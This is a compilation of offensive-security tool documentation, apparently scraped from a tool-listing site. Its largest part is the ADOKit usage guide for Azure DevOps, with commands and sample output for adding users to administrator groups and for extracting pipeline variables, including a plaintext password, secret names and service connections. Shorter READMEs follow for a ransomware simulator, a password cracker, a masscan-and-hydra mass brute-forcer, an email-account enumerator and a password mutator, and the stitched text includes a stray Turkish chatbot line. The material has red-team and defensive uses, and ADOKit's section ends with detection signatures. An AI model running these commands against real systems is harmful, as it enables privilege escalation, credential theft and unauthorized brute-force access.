[MaraudersMap]\Project Administrators | user1@YourOrganization.onmicrosoft.com | User 1
4/4/23 18:52:47 Finished execution of addprojectadmin
Remove a user from the Project Administrators group for a given project.
Provide the removeprojectadmin
module along with a /project:
and /user:
for a given user to be removed from the Project Administrators
group for the given project. Additionally, provide along any relevant authentication information and URL. See Module Details Table for the permissions needed to perform this action.
ADOKit.exe removeprojectadmin /credential:apiKey /url:https://dev.azure.com/organizationName /project:"someProject" /user:"someUser"
ADOKit.exe removeprojectadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /project:"someProject" /user:"someUser"
C:\>ADOKit.exe removeprojectadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /project:"maraudersmap" /user:"user1"
==================================================
Module: removeprojectadmin
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 4/4/2023 3:19:43 PM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
[*] INFO: Attempting to remove user1 from the Project Administrators group for the maraudersmap project.
[+] SUCCESS: User successfully removed
Group | Mail Address | Display Name
------------------------------------------------------------- -------------------------------------------------------------------------------------------------------------------
[MaraudersMap]\Project Administrators | brett.hawkins@YourOrganization.onmicrosoft.com | Brett Hawkins
4/4/23 19:19:44 Finished execution of removeprojectadmin
Add a user to the Build Administrators group for a given project.
Provide the addbuildadmin
module along with a /project:
and /user:
for a given user to be added to the Build Administrators
group for the given project. Additionally, provide along any relevant authentication information and URL. See Module Details Table for the permissions needed to perform this action.
ADOKit.exe addbuildadmin /credential:apiKey /url:https://dev.azure.com/organizationName /project:"someProject" /user:"someUser"
ADOKit.exe addbuildadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /project:"someProject" /user:"someUser"
C:\>ADOKit.exe addbuildadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /project:"maraudersmap" /user:"user1"
==================================================
Module: addbuildadmin
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 4/4/2023 3:41:51 PM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
[*] INFO: Attempting to add user1 to the Build Administrators group for the maraudersmap project.
[+] SUCCESS: User successfully added
Group | Mail Address | Display Name
-------------------------------------------------------------------------------- ------------------------------------------------------------------------------------------------
[MaraudersMap]\Build Administrators | user1@YourOrganization.onmicrosoft.com | User 1
4/4/23 19:41:55 Finished execution of addbuildadmin
Remove a user from the Build Administrators group for a given project.
Provide the removebuildadmin
module along with a /project:
and /user:
for a given user to be removed from the Build Administrators
group for the given project. Additionally, provide along any relevant authentication information and URL. See Module Details Table for the permissions needed to perform this action.
ADOKit.exe removebuildadmin /credential:apiKey /url:https://dev.azure.com/organizationName /project:"someProject" /user:"someUser"
ADOKit.exe removebuildadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /project:"someProject" /user:"someUser"
C:\>ADOKit.exe removebuildadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /project:"maraudersmap" /user:"user1"
==================================================
Module: removebuildadmin
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 4/4/2023 3:42:10 PM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
[*] INFO: Attempting to remove user1 from the Build Administrators group for the maraudersmap project.
[+] SUCCESS: User successfully removed
Group | Mail Address | Display Name
------------------------------------------------------------------- -------------------------------------------------------------------------------------------------------------
4/4/23 19:42:11 Finished execution of removebuildadmin
Add a user to the Project Collection Administrators group.
Provide the addcollectionadmin
module along with a /user:
for a given user to be added to the Project Collection Administrators
group. Additionally, provide along any relevant authentication information and URL. See Module Details Table for the permissions needed to perform this action.
ADOKit.exe addcollectionadmin /credential:apiKey /url:https://dev.azure.com/organizationName /user:"someUser"
ADOKit.exe addcollectionadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /user:"someUser"
C:\>ADOKit.exe addcollectionadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /user:"user1"
==================================================
Module: addcollectionadmin
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 4/4/2023 4:04:40 PM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
[*] INFO: Attempting to add user1 to the Project Collection Administrators group.
[+] SUCCESS: User successfully added
Group | Mail Address | Display Name
-------------------------------------------------------------------------------------------------------------- ------------------------------------------------------------------
[YourOrganization]\Project Collection Administrators | jsmith@YourOrganization.onmicrosoft.com | John Smith
[YourOrganization]\Project Collection Administrators | user1@YourOrganization.onmicrosoft.com | User 1
4/4/23 20:04:43 Finished execution of addcollectionadmin
Remove a user from the Project Collection Administrators group.
Provide the removecollectionadmin
module along with a /user:
for a given user to be removed from the Project Collection Administrators
group. Additionally, provide along any relevant authentication information and URL. See Module Details Table for the permissions needed to perform this action.
ADOKit.exe removecollectionadmin /credential:apiKey /url:https://dev.azure.com/organizationName /user:"someUser"
ADOKit.exe removecollectionadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /user:"someUser"
C:\>ADOKit.exe removecollectionadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /user:"user1"
==================================================
Module: removecollectionadmin
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 4/4/2023 4:10:35 PM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
[*] INFO: Attempting to remove user1 from the Project Collection Administrators group.
[+] SUCCESS: User successfully removed
Group | Mail Address | Display Name
------------------------------------------------------------------------------------------------- -------------------------------------------------------------------------------
[YourOrganization]\Project Collection Administrators | jsmith@YourOrganization.onmicrosoft.com | John Smith
4/4/23 20:10:38 Finished execution of removecollectionadmin
Add a user to the Project Collection Build Administrators group.
Provide the addcollectionbuildadmin
module along with a /user:
for a given user to be added to the Project Collection Build Administrators
group. Additionally, provide along any relevant authentication information and URL. See Module Details Table for the permissions needed to perform this action.
ADOKit.exe addcollectionbuildadmin /credential:apiKey /url:https://dev.azure.com/organizationName /user:"someUser"
ADOKit.exe addcollectionbuildadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /user:"someUser"
C:\>ADOKit.exe addcollectionbuildadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /user:"user1"
==================================================
Module: addcollectionbuildadmin
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 4/5/2023 8:21:39 AM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
[*] INFO: Attempting to add user1 to the Project Collection Build Administrators group.
[+] SUCCESS: User successfully added
Group | Mail Address | Display Name
---------------------------------------------------------------------------------------------- ----------------------------------------------------------------------------------
[YourOrganization]\Project Collection Build Administrators | user1@YourOrganization.onmicrosoft.com | User 1
4/5/23 12:21:42 Finished execution of addcollectionbuildadmin
Remove a user from the Project Collection Build Administrators group.
Provide the removecollectionbuildadmin
module along with a /user:
for a given user to be removed from the Project Collection Build Administrators
group. Additionally, provide along any relevant authentication information and URL. See Module Details Table for the permissions needed to perform this action.
ADOKit.exe removecollectionbuildadmin /credential:apiKey /url:https://dev.azure.com/organizationName /user:"someUser"
ADOKit.exe removecollectionbuildadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /user:"someUser"
C:\>ADOKit.exe removecollectionbuildadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /user:"user1"
==================================================
Module: removecollectionbuildadmin
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 4/5/2023 8:21:59 AM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
[*] INFO: Attempting to remove user1 from the Project Collection Build Administrators group.
[+] SUCCESS: User successfully removed
Group | Mail Address | Display Name
--------------------------------------------------------------------------------- -----------------------------------------------------------------------------------------------
4/5/23 12:22:02 Finished execution of removecollectionbuildadmin
Add a user to the Project Collection Build Service Accounts group.
Provide the addcollectionbuildsvc
module along with a /user:
for a given user to be added to the Project Collection Build Service Accounts
group. Additionally, provide along any relevant authentication information and URL. See Module Details Table for the permissions needed to perform this action.
ADOKit.exe addcollectionbuildsvc /credential:apiKey /url:https://dev.azure.com/organizationName /user:"someUser"
ADOKit.exe addcollectionbuildsvc /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /user:"someUser"
C:\>ADOKit.exe addcollectionbuildsvc /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /user:"user1"
==================================================
Module: addcollectionbuildsvc
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 4/5/2023 8:22:13 AM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
[*] INFO: Attempting to add user1 to the Project Collection Build Service Accounts group.
[+] SUCCESS: User successfully added
Group | Mail Address | Display Name
------------------------------------------------------------------------------------------------ --------------------------------------------------------------------------------
[YourOrganization]\Project Collection Build Service Accounts | user1@YourOrganization.onmicrosoft.com | User 1
4/5/23 12:22:15 Finished execution of addcollectionbuildsvc
Remove a user from the Project Collection Build Service Accounts group.
Provide the removecollectionbuildsvc
module along with a /user:
for a given user to be removed from the Project Collection Build Service Accounts
group. Additionally, provide along any relevant authentication information and URL. See Module Details Table for the permissions needed to perform this action.
ADOKit.exe removecollectionbuildsvc /credential:apiKey /url:https://dev.azure.com/organizationName /user:"someUser"
ADOKit.exe removecollectionbuildsvc /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /user:"someUser"
C:\>ADOKit.exe removecollectionbuildsvc /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /user:"user1"
==================================================
Module: removecollectionbuildsvc
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 4/5/2023 8:22:27 AM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
[*] INFO: Attempting to remove user1 from the Project Collection Build Service Accounts group.
[+] SUCCESS: User successfully removed
Group | Mail Address | Display Name
----------------------------------------------------------------------------------- ---------------------------------------------------------------------------------------------
4/5/23 12:22:28 Finished execution of removecollectionbuildsvc
Add a user to the Project Collection Service Accounts group.
Provide the addcollectionsvc
module along with a /user:
for a given user to be added to the Project Collection Service Accounts
group. Additionally, provide along any relevant authentication information and URL. See Module Details Table for the permissions needed to perform this action.
ADOKit.exe addcollectionsvc /credential:apiKey /url:https://dev.azure.com/organizationName /user:"someUser"
ADOKit.exe addcollectionsvc /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /user:"someUser"
C:\>ADOKit.exe addcollectionsvc /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /user:"user1"
==================================================
Module: addcollectionsvc
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 4/5/2023 11:21:01 AM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
[*] INFO: Attempting to add user1 to the Project Collection Service Accounts group.
[+] SUCCESS: User successfully added
Group | Mail Address | Display Name
--------------------------------------------------------------------------------------------------------------- -----------------------------------------------------------------
[YourOrganization]\Project Collection Service Accounts | jsmith@YourOrganization.onmicrosoft.com | John Smith
[YourOrganization]\Project Collection Service Accounts | user1@YourOrganization.onmicrosoft.com | User 1
4/5/23 15:21:04 Finished execution of addcollectionsvc
Remove a user from the Project Collection Service Accounts group.
Provide the removecollectionsvc
module along with a /user:
for a given user to be removed from the Project Collection Service Accounts
group. Additionally, provide along any relevant authentication information and URL. See Module Details Table for the permissions needed to perform this action.
ADOKit.exe removecollectionsvc /credential:apiKey /url:https://dev.azure.com/organizationName /user:"someUser"
ADOKit.exe removecollectionsvc /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /user:"someUser"
C:\>ADOKit.exe removecollectionsvc /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /user:"user1"
==================================================
Module: removecollectionsvc
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 4/5/2023 11:21:43 AM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
[*] INFO: Attempting to remove user1 from the Project Collection Service Accounts group.
[+] SUCCESS: User successfully removed
Group | Mail Address | Display Name
-------------------------------------------------------------------------------------------------- ------------------------------------------------------------------------------
[YourOrganization]\Project Collection Service Accounts | jsmith@YourOrganization.onmicrosoft.com | John Smith
4/5/23 15:21:44 Finished execution of removecollectionsvc
Extract any pipeline variables being used in project(s), which could contain credentials or other useful information.
Provide the getpipelinevars
module along with a /project:
for a given project to extract any pipeline variables being used. If you would like to extract pipeline variables from all projects specify all
in the /project:
argument.
ADOKit.exe getpipelinevars /credential:apiKey /url:https://dev.azure.com/organizationName /project:"someProject"
ADOKit.exe getpipelinevars /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /project:"someProject"
ADOKit.exe getpipelinevars /credential:apiKey /url:https://dev.azure.com/organizationName /project:"all"
ADOKit.exe getpipelinevars /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /project:"all"
C:\>ADOKit.exe getpipelinevars /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /project:"maraudersmap"
==================================================
Module: getpipelinevars
Auth Type: Cookie
Project: maraudersmap
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 4/6/2023 12:08:35 PM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
Pipeline Var Name | Pipeline Var Value
-----------------------------------------------------------------------------------
credential | P@ssw0rd123!
url | http://blah/
4/6/23 16:08:36 Finished execution of getpipelinevars
Extract the names of any pipeline secrets being used in project(s), which will direct the operator where to attempt to perform secret extraction.
Provide the getpipelinesecrets
module along with a /project:
for a given project to extract the names of any pipeline secrets being used. If you would like to extract the names of pipeline secrets from all projects specify all
in the /project:
argument.
ADOKit.exe getpipelinesecrets /credential:apiKey /url:https://dev.azure.com/organizationName /project:"someProject"
ADOKit.exe getpipelinesecrets /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /project:"someProject"
ADOKit.exe getpipelinesecrets /credential:apiKey /url:https://dev.azure.com/organizationName /project:"all"
ADOKit.exe getpipelinesecrets /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /project:"all"
C:\>ADOKit.exe getpipelinesecrets /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /project:"maraudersmap"
==================================================
Module: getpipelinesecrets
Auth Type: Cookie
Project: maraudersmap
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 4/10/2023 10:28:37 AM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
Build Secret Name | Build Secret Value
-----------------------------------------------------
anotherSecretPass | [HIDDEN]
secretpass | [HIDDEN]
4/10/23 14:28:38 Finished execution of getpipelinesecrets
List any service connections being used in project(s), which will direct the operator where to attempt to perform credential extraction for any service connections being used.
Provide the getserviceconnections
module along with a /project:
for a given project to list any service connections being used. If you would like to list service connections being used from all projects specify all
in the /project:
argument.
ADOKit.exe getserviceconnections /credential:apiKey /url:https://dev.azure.com/organizationName /project:"someProject"
ADOKit.exe getserviceconnections /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /project:"someProject"
ADOKit.exe getserviceconnections /credential:apiKey /url:https://dev.azure.com/organizationName /project:"all"
ADOKit.exe getserviceconnections /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /project:"all"
C:\>ADOKit.exe getserviceconnections /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /project:"maraudersmap"
==================================================
Module: getserviceconnections
Auth Type: Cookie
Project: maraudersmap
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 4/11/2023 8:34:16 AM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
Connection Name | Connection Type | ID
--------------------------------------------------------------------------------------------------------------------------------------------------
Test Connection Name | generic | 195d960c-742b-4a22-a1f2-abd2c8c9b228
Not Real Connection | generic | cd74557e-2797-498f-9a13-6df692c22cac
Azure subscription 1(47c5aaab-dbda-44ca-802e-00801de4db23) | azurerm | 5665ed5f-3575-4703-a94d-00681fdffb04
Azure subscription 1(1)(47c5aaab-dbda-44ca-802e-00801de4db23) | azurerm | df8c023b-b5ad-4925-a53d-bb29f032c382
4/11/23 12:34:16 Finished execution of getserviceconnections
Below are static signatures for the specific usage of this tool in its default state:
{60BC266D-1ED5-4AB5-B0DD-E1001C3B1498}
ADOKit-21e233d4334f9703d1a3a42b6e2efd38
ADOKitUsage.json
- Detects the usage of ADOKit with any auditable event (e.g., adding a user to a group)PersistenceTechniqueWithADOKit.json
- Detects the creation of a PAT or SSH key with ADOKitFor detection guidance of the techniques used by the tool, see the X-Force Red whitepaper.
https://learn.microsoft.com/en-us/rest/api/azure/devops/?view=azure-devops-rest-7.1
https://learn.microsoft.com/en-us/azure/devops/user-guide/what-is-azure-devops?view=azure-devops
RansomwareSim is a simulated ransomware application developed for educational and training purposes. It is designed to demonstrate how ransomware encrypts files on a system and communicates with a command-and-control server. This tool is strictly for educational use and should not be used for malicious purposes.
Important
: This tool should only be used in controlled environments where all participants have given consent. Do not use this tool on any system without explicit permission. For more, read SECURE
Clone the repository:
git clone https://github.com/HalilDeniz/RansomwareSim.git
Navigate to the project directory:
cd RansomwareSim
Install the required dependencies:
pip install -r requirements.txt
controlpanel.py
.controlpanel.py
.RansomwareSim
and the Decoder
.RansomwareSim
.main
function in encoder.py
to specify the target directory and other parameters.encoder.py
to start the encryption process.decoder.py
after the files have been encrypted.RansomwareSim is developed for educational purposes only. The creators of RansomwareSim are not responsible for any misuse of this tool. This tool should not be used in any unauthorized or illegal manner. Always ensure ethical and legal use of this tool.
Contributions, suggestions, and feedback are welcome. Please create an issue or pull request for any contributions.
For any inquiries or further information, you can reach me through the following channels:
PassBreaker is a command-line password cracking tool developed in Python. It allows you to perform various password cracking techniques such as wordlist-based attacks and brute force attacks.Β
Clone the repository:
git clone https://github.com/HalilDeniz/PassBreaker.git
Install the required dependencies:
pip install -r requirements.txt
python passbreaker.py <password_hash> <wordlist_file> [--algorithm]
Replace <password_hash>
with the target password hash and <wordlist_file>
with the path to the wordlist file containing potential passwords.
--algorithm <algorithm>
: Specify the hash algorithm to use (e.g., md5, sha256, sha512).-s, --salt <salt>
: Specify a salt value to use.-p, --parallel
: Enable parallel processing for faster cracking.-c, --complexity
: Evaluate password complexity before cracking.-b, --brute-force
: Perform a brute force attack.--min-length <min_length>
: Set the minimum password length for brute force attacks.--max-length <max_length>
: Set the maximum password length for brute force attacks.--character-set <character_set>
: Set the character set to use for brute force attacks.Elbette! Δ°Εte Δ°ngilizce olarak yazΔ±lmΔ±Ε baΕlΔ±k ve küçük bir bilgi ile daha fazla kullanΔ±m ΓΆrneΔi:
python passbreaker.py 5f4dcc3b5aa765d61d8327deb882cf99 passwords.txt --algorithm md5
This command attempts to crack the password with the hash value "5f4dcc3b5aa765d61d8327deb882cf99" using the MD5 algorithm and a wordlist from the "passwords.txt" file.
python passbreaker.py 5f4dcc3b5aa765d61d8327deb882cf99 --brute-force --min-length 6 --max-length 8 --character-set abc123
This command performs a brute force attack to crack the password with the hash value "5f4dcc3b5aa765d61d8327deb882cf99" by trying all possible combinations of passwords with a length between 6 and 8 characters, using the character set "abc123".
python passbreaker.py 5f4dcc3b5aa765d61d8327deb882cf99 passwords.txt --algorithm sha256 --complexity
This command evaluates the complexity of passwords in the "passwords.txt" file and attempts to crack the password with the hash value "5f4dcc3b5aa765d61d8327deb882cf99" using the SHA-256 algorithm. It only tries passwords that meet the complexity requirements.
python passbreaker.py 5f4dcc3b5aa765d61d8327deb882cf99 passwords.txt --algorithm md5 --salt mysalt123
This command uses a specific salt value ("mysalt123") for the password cracking process. Salt is used to enhance the security of passwords.
python passbreaker.py 5f4dcc3b5aa765d61d8327deb882cf99 passwords.txt --algorithm sha512 --parallel
This command performs password cracking with parallel processing for faster cracking. It utilizes multiple processing cores, but it may consume more system resources.
These examples demonstrate different features and use cases of the "PassBreaker" password cracking tool. Users can customize the parameters based on their needs and goals.
This tool is intended for educational and ethical purposes only. Misuse of this tool for any malicious activities is strictly prohibited. The developers assume no liability and are not responsible for any misuse or damage caused by this tool.
Contributions are welcome! To contribute to PassBreaker, follow these steps:
If you have any questions, comments, or suggestions about PassBreaker, please feel free to contact me:
PassBreaker is released under the MIT License. See LICENSE for more information.
Mass bruteforce network protocols
Simple personal script to quickly mass bruteforce common services in a large scale of network.
It will check for default credentials on ftp, ssh, mysql, mssql...etc.
This was made for authorized red team penetration testing purpose only.
masscan
(faster than nmap) to find alive hosts with common ports from network segment.masscan
result.hydra
commands to automatically bruteforce supported network services on devices.Kali linux
or any preferred linux distributionPython 3.10+
# Clone the repo
git clone https://github.com/opabravo/mass-bruter
cd mass-bruter
# Install required tools for the script
apt update && apt install seclists masscan hydra
Private ip range :
10.0.0.0/8
,192.168.0.0/16
,172.16.0.0/12
Save masscan results under ./result/masscan/
, with the format masscan_<name>.<ext>
Ex: masscan_192.168.0.0-16.txt
Example command:
masscan -p 3306,1433,21,22,23,445,3389,5900,6379,27017,5432,5984,11211,9200,1521 172.16.0.0/12 | tee ./result/masscan/masscan_test.txt
Example Resume Command:
masscan --resume paused.conf | tee -a ./result/masscan/masscan_test.txt
Command Options
βββ(rootγΏroot)-[~/mass-bruter]
ββ# python3 mass_bruteforce.py
Usage: [OPTIONS]
Mass Bruteforce Script
Options:
-q, --quick Quick mode (Only brute telnet, ssh, ftp , mysql,
mssql, postgres, oracle)
-a, --all Brute all services(Very Slow)
-s, --show Show result with successful login
-f, --file-path PATH The directory or file that contains masscan result
[default: ./result/masscan/]
--help Show this message and exit.
Quick Bruteforce Example:
python3 mass_bruteforce.py -q -f ~/masscan_script.txt
Fetch cracked credentials:
python3 mass_bruteforce.py -s
dpl4hydra
Any contributions are welcomed!
OSINT framework focused on gathering information from free tools or resources. The intention is to help people find free OSINT resources. Some of the sites included might require registration or offer more data for $$$, but you should be able to get at least a portion of the available information for no cost.
I originally created this framework with an information security point of view. Since then, the response from other fields and disciplines has been incredible. I would love to be able to include any other OSINT resources, especially from fields outside of infosec. Please let me know about anything that might be missing!
Please visit the framework at the link below and good hunting!
(T) - Indicates a link to a tool that must be installed and run locally
(D) - Google Dork, for more information: Google Hacking
(R) - Requires registration
(M) - Indicates a URL that contains the search term and the URL itself must be edited manually
Follow me on Twitter: @jnordine - https://twitter.com/jnordine
Watch or star the project on Github: https://github.com/lockfale/osint-framework
Feedback or new tool suggestions are extremely welcome! Please feel free to submit a pull request or open an issue on github or reach out on Twitter.
For new resources, please ensure that the site is available for public and free use.
Thank you!
Happy Hunting!
Efficiently finding registered accounts from emails.
Holehe checks if an email is attached to an account on sites like twitter, instagram, imgur and more than 120 others.
pip3 install holehe
git clone https://github.com/megadose/holehe.git
cd holehe/
python3 setup.py install
Holehe can be run from the CLI and rapidly embedded within existing python applications.
holehe test@gmail.com
import trio
import httpx
from holehe.modules.social_media.snapchat import snapchat
async def main():
email = "test@gmail.com"
out = []
client = httpx.AsyncClient()
await snapchat(email, client, out)
print(out)
await client.aclose()
trio.run(main)
For each module, data is returned in a standard dictionary with the following json-equivalent format :
{
"name": "example",
"rateLimit": false,
"exists": true,
"emailrecovery": "ex****e@gmail.com",
"phoneNumber": "0*******78",
"others": null
}
Rate limit? Change your IP.
For BTC Donations : 1FHDM49QfZX6pJmhjLE5tB2K6CaTLMZpXZ
GNU General Public License v3.0
Built for educational purposes only.
Name | Domain | Method | Frequent Rate Limit |
---|---|---|---|
aboutme | about.me | register | β |
adobe | adobe.com | password recovery | β |
amazon | amazon.com | login | β |
amocrm | amocrm.com | register | β |
anydo | any.do | login | β |
archive | archive.org | register | β |
armurerieauxerre | armurerie-auxerre.com | register | β |
atlassian | atlassian.com | register | β |
axonaut | axonaut.com | register | β |
babeshows | babeshows.co.uk | register | β |
badeggsonline | badeggsonline.com | register | β |
biosmods | bios-mods.com | register | β |
biotechnologyforums | biotechnologyforums.com | register | β |
bitmoji | bitmoji.com | login | β |
blablacar | blablacar.com | register | β |
blackworldforum | blackworldforum.com | register | β |
blip | blip.fm | register | β |
blitzortung | forum.blitzortung.org | register | β |
bluegrassrivals | bluegrassrivals.com | register | β |
bodybuilding | bodybuilding.com | register | β |
buymeacoffee | buymeacoffee.com | register | β |
cambridgemt | discussion.cambridge-mt.com | register | β |
caringbridge | caringbridge.org | register | β |
chinaphonearena | chinaphonearena.com | register | β |
clashfarmer | clashfarmer.com | register | β |
codecademy | codecademy.com | register | β |
codeigniter | forum.codeigniter.com | register | β |
codepen | codepen.io | register | β |
coroflot | coroflot.com | register | β |
cpaelites | cpaelites.com | register | β |
cpahero | cpahero.com | register | β |
cracked_to | cracked.to | register | β |
crevado | crevado.com | register | β |
deliveroo | deliveroo.com | register | β |
demonforums | demonforums.net | register | β |
devrant | devrant.com | register | β |
diigo | diigo.com | register | β |
discord | discord.com | register | β |
docker | docker.com | register | β |
dominosfr | dominos.fr | register | β |
ebay | ebay.com | login | β |
ello | ello.co | register | β |
envato | envato.com | register | β |
eventbrite | eventbrite.com | login | β |
evernote | evernote.com | login | β |
fanpop | fanpop.com | register | β |
firefox | firefox.com | register | β |
flickr | flickr.com | login | β |
freelancer | freelancer.com | register | β |
freiberg | drachenhort.user.stunet.tu-freiberg.de | register | β |
garmin | garmin.com | register | β |
github | github.com | register | β |
google.com | register | β | |
gravatar | gravatar.com | other | β |
hubspot | hubspot.com | login | β |
imgur | imgur.com | register | β |
insightly | insightly.com | login | β |
instagram.com | register | β | |
issuu | issuu.com | register | β |
koditv | forum.kodi.tv | register | β |
komoot | komoot.com | register | β |
laposte | laposte.fr | register | β |
lastfm | last.fm | register | β |
lastpass | lastpass.com | register | β |
mail_ru | mail.ru | password recovery | β |
mybb | community.mybb.com | register | β |
myspace | myspace.com | register | β |
nattyornot | nattyornotforum.nattyornot.com | register | β |
naturabuy | naturabuy.fr | register | β |
ndemiccreations | forum.ndemiccreations.com | register | β |
nextpvr | forums.nextpvr.com | register | β |
nike | nike.com | register | β |
nimble | nimble.com | register | β |
nocrm | nocrm.io | register | β |
nutshell | nutshell.com | register | β |
odnoklassniki | ok.ru | password recovery | β |
office365 | office365.com | other | β |
onlinesequencer | onlinesequencer.net | register | β |
parler | parler.com | login | β |
patreon | patreon.com | login | β |
pinterest.com | register | β | |
pipedrive | pipedrive.com | register | β |
plurk | plurk.com | register | β |
pornhub | pornhub.com | register | β |
protonmail | protonmail.ch | other | β |
quora | quora.com | register | β |
rambler | rambler.ru | register | β |
redtube | redtube.com | register | β |
replit | replit.com | register | β |
rocketreach | rocketreach.co | register | β |
samsung | samsung.com | register | β |
seoclerks | seoclerks.com | register | β |
sevencups | 7cups.com | register | β |
smule | smule.com | register | β |
snapchat | snapchat.com | login | β |
soundcloud | soundcloud.com | register | β |
sporcle | sporcle.com | register | β |
spotify | spotify.com | register | β |
strava | strava.com | register | β |
taringa | taringa.net | register | β |
teamleader | teamleader.com | register | β |
teamtreehouse | teamtreehouse.com | register | β |
tellonym | tellonym.me | register | β |
thecardboard | thecardboard.org | register | β |
therianguide | forums.therian-guide.com | register | β |
thevapingforum | thevapingforum.com | register | β |
tumblr | tumblr.com | register | β |
tunefind | tunefind.com | register | β |
twitter.com | register | β | |
venmo | venmo.com | register | β |
vivino | vivino.com | register | β |
voxmedia | voxmedia.com | register | β |
vrbo | vrbo.com | register | β |
vsco | vsco.co | register | β |
wattpad | wattpad.com | register | β |
wordpress | wordpress | login | β |
xing.com | register | β | |
xnxx | xnxx.com | register | β |
xvideos | xvideos.com | register | β |
yahoo | yahoo.com | login | β |
zoho | zoho.com | login | β |
This is a command-line tool written in Python that applies one or more transmutation rules to a given password or a list of passwords read from one or more files. The tool can be used to generate transformed passwords for security testing or research purposes. Also, while you doing pentesting it will be very useful tool for you to brute force the passwords!!
How Passmute can also help to secure our passwords more?
PassMute can help to generate strong and complex passwords by applying different transformation rules to the input password. However, password security also depends on other factors such as the length of the password, randomness, and avoiding common phrases or patterns.
The transformation rules include:
reverse: reverses the password string
uppercase: converts the password to uppercase letters
lowercase: converts the password to lowercase letters
swapcase: swaps the case of each letter in the password
capitalize: capitalizes the first letter of the password
leet: replaces some letters in the password with their leet equivalents
strip: removes all whitespace characters from the password
The tool can also write the transformed passwords to an output file and run the transformation process in parallel using multiple threads.
Installation
git clone https://HITH-Hackerinthehouse/PassMute.git
cd PassMute
chmod +x PassMute.py
Usage To use the tool, you need to have Python 3 installed on your system. Then, you can run the tool from the command line using the following options:
python PassMute.py [-h] [-f FILE [FILE ...]] -r RULES [RULES ...] [-v] [-p PASSWORD] [-o OUTPUT] [-t THREAD_TIMEOUT] [--max-threads MAX_THREADS]
Here's a brief explanation of the available options:
-h or --help: shows the help message and exits
-f (FILE) [FILE ...], --file (FILE) [FILE ...]: one or more files to read passwords from
-r (RULES) [RULES ...] or --rules (RULES) [RULES ...]: one or more transformation rules to apply
-v or --verbose: prints verbose output for each password transformation
-p (PASSWORD) or --password (PASSWORD): transforms a single password
-o (OUTPUT) or --output (OUTPUT): output file to save the transformed passwords
-t (THREAD_TIMEOUT) or --thread-timeout (THREAD_TIMEOUT): timeout for threads to complete (in seconds)
